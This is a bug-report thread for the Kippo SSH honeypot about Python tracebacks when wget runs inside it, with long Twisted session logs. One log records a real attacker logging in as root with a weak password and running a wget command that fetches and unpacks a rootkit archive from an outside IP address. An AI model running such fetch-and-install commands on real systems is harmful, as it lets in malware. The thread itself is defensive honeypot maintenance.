search

desaster / kippo

Kippo - SSH Honeypot
1.61k stars 279 forks source link

traceback when wget is used #38

Closed ghost closed 10 years ago

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 21:22:06

What steps will reproduce the problem? 1. use wget in honeypot

  1. kippo generates tracebacks ; honeypot freezes up + times out What is the expected output? What do you see instead? I expect hack0rs to pull down their rootkits without issue. ;)

wget is available outside of the honeypot ; there is no egress/OUTPUT filter on the OS hosting the honeypot What version of the product are you using? On what operating system? kippo 0.5 atop i386 CentOS 5.5 Xen DomU within i386 CentOS 5.5 Dom0 Please provide any additional information below. Traceback: 2011-03-04 10:05:10-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 89.123.100.59:26067 (xxx.xxx.xxx.xxx:2222) [session: 8330] 2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] Remote SSH version: SSH-2.0-PuTTY_Release_0.60 2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] outgoing: aes256-ctr hmac-sha1 none 2011-03-04 10:05:10-0500 [HoneyPotTransport,8330,89.123.100.59] incoming: aes256-ctr hmac-sha1 none 2011-03-04 10:05:11-0500 [HoneyPotTransport,8330,89.123.100.59] NEW KEYS 2011-03-04 10:05:11-0500 [HoneyPotTransport,8330,89.123.100.59] starting service ssh-userauth 2011-03-04 10:05:11-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root trying auth none 2011-03-04 10:05:11-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root trying auth keyboard-interactive 2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] login attempt [root/123456] succeeded 2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] root authenticated with keyboard-interactive 2011-03-04 10:05:14-0500 [SSHService ssh-userauth on HoneyPotTransport,8330,89.123.100.59] starting service ssh-connection 2011-03-04 10:05:14-0500 [SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] got channel session request 2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] channel open 2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] pty request: xterm (24L, 80L, 0L, 0L) 2011-03-04 10:05:14-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Terminal size: 24 80 2011-03-04 10:05:15-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] getting shell 2011-03-04 10:05:15-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Opening TTY log: log/tty/20110304-100515-7572.log 2011-03-04 10:05:17-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: w 2011-03-04 10:05:17-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: w 2011-03-04 10:05:20-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: ps x 2011-03-04 10:05:20-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: ps x 2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: cat /proc/cpuinfo 2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: cat /proc/cpuinfo 2011-03-04 10:05:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Updating realfile to honeyfs//proc/cpuinfo 2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] CMD: wget http://208.75.230.43/driftkingdst/Stest.tgz ; tar zxvf Stest.tgz ; cd .s ; chmod +x 2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Command found: wget http://208.75.230.43/driftkingdst/Stest.tgz 2011-03-04 10:05:40-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8330,89.123.100.59] Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(_args,__kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived return f(packet) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- --- File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(args,*kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived self.client.transport.write(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write self.proto.dataReceived(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/opt/kippo-0.5/kippo/core/honeypot.py", line 243, in keystrokeReceived recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 198, in keystrokeReceived m() File "/opt/kippo-0.5/kippo/core/honeypot.py", line 270, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN ...

Original issue: http://code.google.com/p/kippo/issues/detail?id=38

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 12:47:20

I make kippo traceback just wgetting the Googs:

2011-03-04 15:30:30-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:61593 (xx.xx.xx.xx:2222) [session: 8337] 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] outgoing: aes128-ctr hmac-md5 none 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] incoming: aes128-ctr hmac-md5 none 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] NEW KEYS 2011-03-04 15:30:30-0500 [HoneyPotTransport,8337,76.127.176.170] starting service ssh-userauth 2011-03-04 15:30:30-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root trying auth none 2011-03-04 15:30:30-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root trying auth keyboard-interactive 2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] login attempt [root/123456] succeeded 2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] root authenticated with keyboard-interactive 2011-03-04 15:30:33-0500 [SSHService ssh-userauth on HoneyPotTransport,8337,76.127.176.170] starting service ssh-connection 2011-03-04 15:30:33-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got channel session request 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] channel open 2011-03-04 15:30:33-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global no-more-sessions@openssh.com request 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] unhandled request for auth-agent-req@openssh.com 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] pty request: xterm-color (24L, 80L, 560L, 336L) 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Terminal size: 24 80 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] getting shell 2011-03-04 15:30:33-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Opening TTY log: log/tty/20110304-153033-1555.log 2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] CMD: wget google.com 2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Command found: wget google.com 2011-03-04 15:30:38-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(_args,__kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived return f(packet) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- --- File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(args,kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived self.client.transport.write(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write self.proto.dataReceived(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/opt/kippo-0.5/kippo/core/honeypot.py", line 243, in keystrokeReceived recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 198, in keystrokeReceived m() File "/opt/kippo-0.5/kippo/core/honeypot.py", line 270, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN self.lineReceived(line) File "/opt/kippo-0.5/kippo/core/honeypot.py", line 237, in lineReceived self.cmdstack[-1].lineReceived(line) File "/opt/kippo-0.5/kippo/core/honeypot.py", line 67, in lineReceived self.runCommand() File "/opt/kippo-0.5/kippo/core/honeypot.py", line 119, in runCommand self.honeypot.call_command(cmdclass, *rargs) File "/opt/kippo-0.5/kippo/core/honeypot.py", line 263, in call_command obj.start() File "/opt/kippo-0.5/kippo/commands/wget.py", line 60, in start outfile = urldata.path.split('/')[-1] exceptions.AttributeError: 'tuple' object has no attribute 'path'

2011-03-04 15:30:48-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:30:58-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:08-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:18-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:28-0500 [SSHService ssh-connection on HoneyPotTransport,8337,...

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 12:47:20

...76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:38-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:48-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:31:58-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:08-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:18-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:28-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:38-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:48-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:32:58-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:08-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:18-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:28-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:38-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:48-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:33:58-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:08-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:18-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:28-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:38-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:48-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:34:58-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:08-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:18-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:49-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:35:59-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:09-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:19-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:49-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:36:59-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:09-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:19-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:49-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:37:59-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:09-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:19-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:49-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:38:59-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:09-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:19-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:49-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:39:59-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 201...

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 12:47:20

...1-03-04 15:40:09-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:40:19-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:40:29-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:40:39-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:40:50-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:00-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:10-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:20-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:30-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:40-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:41:50-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:00-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:10-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:20-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:30-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:40-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:42:50-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:00-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:10-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:20-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:30-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:40-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:43:50-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:44:00-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:44:10-0500 [SSHService ssh-connection on HoneyPotTransport,8337,76.127.176.170] got global keepalive@openssh.com request 2011-03-04 15:44:20-0500 [HoneyPotTransport,8337,76.127.176.170] connection lost

ghost commented 10 years ago

From desaster on March 04, 2011 13:12:26

Hmmm I think I've changed that code to use another url parser....

Can you check if you have the problem with the svn version? https://code.google.com/p/kippo/source/checkout I'll look into it a bit closer later, but this is just something that comes to mind right away

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 19:36:20

I grabbed trunk. Startup tracebacks about no hashlib. Installed. Started fine. Similar situation of tracebacks when clients within the honeypot attempt to wget:

2011-03-04 22:24:20-0500 [-] Log opened. 2011-03-04 22:24:20-0500 [-] twistd 10.2.0 (/usr/bin/python 2.4.3) starting up. 2011-03-04 22:24:20-0500 [-] reactor class: twisted.internet.selectreactor.SelectReactor. 2011-03-04 22:24:20-0500 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222 2011-03-04 22:24:20-0500 [-] Starting factory <kippo.core.honeypot.HoneyPotSSHFactory instance at 0xb7ae75cc> 2011-03-04 22:24:35-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:62511 (xx.xx.xx.xx:2222) [session: 0] 2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2 2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] outgoing: aes128-ctr hmac-md5 none 2011-03-04 22:24:36-0500 [HoneyPotTransport,0,76.127.176.170] incoming: aes128-ctr hmac-md5 none 2011-03-04 22:24:37-0500 [HoneyPotTransport,0,76.127.176.170] connection lost 2011-03-04 22:24:43-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:62512 (xx.xx.xx.xx:2222) [session: 1] 2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2 2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] outgoing: aes128-ctr hmac-md5 none 2011-03-04 22:24:43-0500 [HoneyPotTransport,1,76.127.176.170] incoming: aes128-ctr hmac-md5 none 2011-03-04 22:24:45-0500 [HoneyPotTransport,1,76.127.176.170] NEW KEYS 2011-03-04 22:24:45-0500 [HoneyPotTransport,1,76.127.176.170] starting service ssh-userauth 2011-03-04 22:24:45-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root trying auth none 2011-03-04 22:24:45-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root trying auth keyboard-interactive 2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] login attempt [root/123456] succeeded 2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] root authenticated with keyboard-interactive 2011-03-04 22:24:48-0500 [SSHService ssh-userauth on HoneyPotTransport,1,76.127.176.170] starting service ssh-connection 2011-03-04 22:24:48-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got channel session request 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] channel open 2011-03-04 22:24:48-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got global no-more-sessions@openssh.com request 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] unhandled request for auth-agent-req@openssh.com 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] pty request: xterm-color (24L, 80L, 560L, 336L) 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Terminal size: 24 80 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] getting shell 2011-03-04 22:24:48-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Opening TTY log: log/tty/20110304-222448-7545.log 2011-03-04 22:24:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] /etc/motd resolved into /etc/motd 2011-03-04 22:24:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] /var/run/motd resolved into /var/run/motd 2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] CMD: wget google.com 2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Command found: wget google.com 2011-03-04 22:24:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(_args,__kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/service.py", line 44, in packetReceived return f(packet) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/connection.py", line 243, in ssh_CHANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- --- File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, _args, _kw) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/python/context.py", line 37, in callWithContext return func(args,kw) File 